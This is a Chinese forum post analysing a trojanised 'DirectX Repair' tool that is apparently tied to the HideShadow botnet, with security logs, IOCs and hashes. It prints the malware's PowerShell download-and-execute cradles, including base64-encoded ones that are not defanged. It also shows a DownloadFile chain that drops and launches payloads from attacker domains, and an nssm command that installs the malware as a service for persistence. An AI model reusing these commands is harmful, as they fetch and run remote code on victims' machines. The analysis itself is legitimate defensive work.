吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 6368|回复: 13
收起左侧

[PC样本分析] 疑似匿影僵尸网络最新活动

  [复制链接]
ahov 发表于 2022-5-30 19:12
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 ahov 于 2022-5-30 20:15 编辑

一、 背景

近日,在帮助用户解决病毒问题时,发现用户中的是下载者木马。
其中一条日志内容为:

防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
操作结果:已允许

进程ID:6504
操作进程:C:\Windows\nssm.exe
操作进程命令行:C:\Windows\nssm.exe
操作进程校验和:32559A80C27A69C15A1AAAD2B6AE7B893ECF69B1
父进程ID:1080
父进程:C:\Windows\System32\services.exe
父进程命令行:C:\Windows\system32\services.exe


操作系统目录竟然出现了nssm工具

将操作进程命令行进行base64解密即可得到:IEX ((new-object net.webclient).downloadstring('hxxp://ye.yearidper.com'))


通过查询威胁情报,寻找到一个类似的样本hxxp://win.yearidper.com/per.txt

继续研究安全日志,发现一条日志内容为:


防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell  "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作结果:已阻止

进程ID:18248
操作进程:C:\Windows\SysWOW64\cmd.exe
操作进程命令行:cmd.exe /c powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作进程校验和:4048488DE6BA4BFEF9EDF103755519F1F762668F
父进程ID:13520
父进程:C:\Windows\SysWOW64\mmc.exe
父进程命令行:mmc.exe


将该URL下载后,发现其为PowerShell下载者木马。

再次查阅安全日志:


病毒名称:Trojan/Agent
病毒ID:A68B6378A5A9FBBE
病毒路径:C:\Users\Public\sharpwmi.exe
操作类型:修改
操作结果:已处理

进程ID:13520
操作进程:C:\Windows\SysWOW64\mmc.exe
操作进程命令行:mmc.exe
父进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe


发现病毒将部分文件保存至C:\Users\Public下,打开C:\Users\Public,发现多个永恒之蓝漏洞攻击程序和爆破攻击程序(pass.txt为密码字典,user.txt为用户名字典):
IMG_4983.JPG IMG_4984.JPG

继续翻阅安全日志:


风险路径:C:\Windows\system32\WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件
风险路径:C:\Windows\SysWOW64\WMIHACKER_0.6.vbs, 病毒名:Backdoor/VBS.WMIHacker.a, 病毒ID:a81b2725827b6a11, 处理结果:已处理,删除文件


可发现病毒往系统目录塞了两个可疑vbs,文件名为WMIHACKER_0.6.vbs经过查询,WMIHACKER为内网横向渗透攻击工具。

询问用户后,用户称下载并运行了一个“dx修复工具”(DirectXRepair_4.1.0.30770_Online.rar)后出现相关症状。

二、追溯
(一)
通过hxxp://ye.yearidper.com,可查询到之前多人在多个论坛中此毒,如下图所示
IMG_4980.jpg IMG_4985.jpg IMG_4988.JPG

(二)
1.
通过对hxxp://cdn.comenbove.com的威胁情报查询,发现了一个通信样本(9438183a93abc1f1dbb980b9de99bb8838267f6ca14cb33b1e29b42ebb8dfa97):
IMG_4978.jpg


该样本伪装为Steam相关文件

PE文件信息:

文件说明:Steam
文件版本:2.10.91.91
产品名称:Steam
语言:0x0816 0x04e4
版权:© Valve Corporation

运行后,该样本会直接访问并下载hxxp://cdn.comenbove.com/shell.txt,内容为Powershell下载者木马:


(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt


该样本同时会执行命令行:


powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA1AGQALgBiAGIAYQBjAHAAdQBtAG0AZAAuAGMAbABvAHUAZAAnACkAKQA=

base64解密后为:
IEX ((new-object net.webclient).downloadstring('hxxp://5d.bbacpummd.cloud'))

访问并下载hxxp://5d.bbacpummd.cloud,内容为:


(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

同时,我们发现,样本还会访问并下载http://5d.strongapt.ml当中的文件,但网站已挂,经过查询发现该域名曾被用于“匿影”僵尸网络投放此前的“WannaRen”勒索病毒(360发现,此前地址为hxxps://api.strongapt.ml/vmp2.jpg),奇安信也早已将多个通信域名标记为“HideShadowMiner”家族处理。


IMG_4979.jpg

实锤为疑似“匿影”僵尸网络相关病毒样本。


2.
通过对hxxp://cdn.comenbove.com的威胁情报查询,又发现该服务器还有一个hxxp://cdn.comenbove.com/smb.jpg,如下图所示:

IMG_4989.jpg


内容为:

$fileNames = Test-Path C:\ProgramData\smbx22.txt
$nic='True'
if($fileNames -ne $nic){
(new-object System.Net.WebClient).DownloadFile( 'https://www.upload.ee/files/14046702/1.txt.html','C:\ProgramData\smbx22.txt')

    }

(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt


https://www.upload.ee/files/14046702/1.txt.html为0kb空白空文件)


三、对带毒DirectXRepair进行探究

文件名:DirectX Repair.exe

PE文件信息:


File Version Information:

Original Name:加入任务计划.exe
Internal Name:加入任务计划
File Version:1.0

文件运行后,会一边释放“dx修复工具”所需文件,一边释放nssm.exe至系统目录下:


Files Dropped:


%ProgramData%\DirectX Repair.exe
%windir%\nssm.exe

随后,便会命令行执行:


%windir%\nssm.exe install nssmsevr powershell.exe -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA


(与“一、背景”一章当中为同一个Powershell命令,base64解密结果与第一章一致)

经过分析,样本会在%ProgramData%内释放正常使用“dx修复”功能所需的组件,而背后又在一边偷偷释放和执行%windir%\nssm.exe与cmd或Powershell下载者木马命令行,相关思维导图如下图所示:
IMG_4990.jpg IMG_4991.jpg

四、价值意义


“匿影”僵尸网络曾投放“WannaRen”等勒索病毒,甚至有一部分用户中此病毒时同时中了勒索病毒(暂时无法确定其是否有关联),虽然暂未发现其他行为,但是对用户危害较大,其危害性不容小觑,用户发现告警后需及时处理。

五、Iocs

文件名病毒类型MD5
EternalBlue.ps1漏洞攻击程序17631532e3afc09eb8ccbe172adbd422
MS17010EXP.ps1漏洞攻击程序3d485260a28a458ec499a6951640f651
NoPSExec.exe黑客工具9a029b987b9a8df9613559dbe67969b5
sharpwmi.exe黑客工具8fdf897330a9c01776a4242d26089622
smbexec40.exe黑客工具23d02116f7489304bac069051636bcc8
WMIHACKER_0.6.vbs黑客工具ceb337687402e19efdf57264b2682d08
shellPowershell下载者f409c880cd868f743e30ac4b7db611fe
Ladon66.jpgPowershell下载者c8c04f28271812c48497f55e7d3d951f
smb.jpgPowershell下载者bbf56807db3e256d38aee5b3386f601a
Ladon.exe木马病毒2a871079cd6f8d845de0554a6ba29ddf
Asy.jpg木马病毒8a846340033c363af8efdbe4f865d2ad
Steam.exe木马病毒c1e7fc36f3a71f6dcb210b4f3127918d
DirectX Repair.exe木马病毒e5ec937968841a68872ac135039b3914

hxxp://ye.yearidper.com
hxxp://cdn.comenbove.com/Ladon66.jpg
hxxp://cdn.comenbove.com/shell.txt
hxxp://cdn.comenbove.com/smbdown/cp.txt
hxxp://cdn.comenbove.com/smbdown/abc.jpg
hxxp://cdn.comenbove.com/Asy.jpg
hxxp://cdn.comenbove.com/smb.jpg
hxxp://5d.bbacpummd.cloud/

*本文当中恶意链接均已做无害化处理(hxxp),base64代码可能会被防病毒软件检测到属正常现象网页不可被直接执行为了保证文章尽量完整暂时不做处理。

免费评分

参与人数 6威望 +1 吾爱币 +25 热心值 +6 收起 理由
你可真傻 + 1 + 1 热心回复!
HarryPotter9 + 1 + 1 我很赞同!
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
舞步乱了 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
我爱猫哥 + 1 + 1 我很赞同!
qyhengda + 1 + 1 鼓励转贴优秀软件安全工具和文档!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

心伤的天堂 发表于 2022-5-31 17:28
我爱猫哥 发表于 2022-5-31 16:28
能不能提供下  pass.txt和 user.txt  两个字典

  你这角度特殊 哈哈
江月518 发表于 2022-7-1 22:46
前天我外网的虚拟机也被中了僵尸病毒,那个中毒的虚拟机一直攻击我的物理机,我反查下工具者的IP都是来自北京的某家云服务器的攻击。估计他家服务器也全部沦陷了,这个僵尸病毒太可怕了
捕获.PNG
我爱猫哥 发表于 2022-5-31 16:28
skywalker0123 发表于 2022-5-31 18:42
微步在线云沙箱还挺好用的。如果那个人不是动态IP,还可以用微步查查
月清晖 发表于 2022-6-1 08:08
病毒更倾向于伪装和传播了
lizooo 发表于 2022-6-1 11:25
以后下载软件必须先进沙盒测试了,不然心里不安定呀
我爱猫哥 发表于 2022-6-1 12:21

爱好就是搜集各种字典、密码
wyd521 发表于 2022-6-1 13:13
这个病毒真的是太狡猾了
notifier 发表于 2022-6-9 22:31
我爱猫哥 发表于 2022-5-31 16:28
能不能提供下  pass.txt和 user.txt  两个字典

舍不得孩子套不着狼~ 染个毒就有了
99910369 发表于 2022-6-9 23:04
所以 影子卫士搞起,裸,,,奔
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 11:10

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表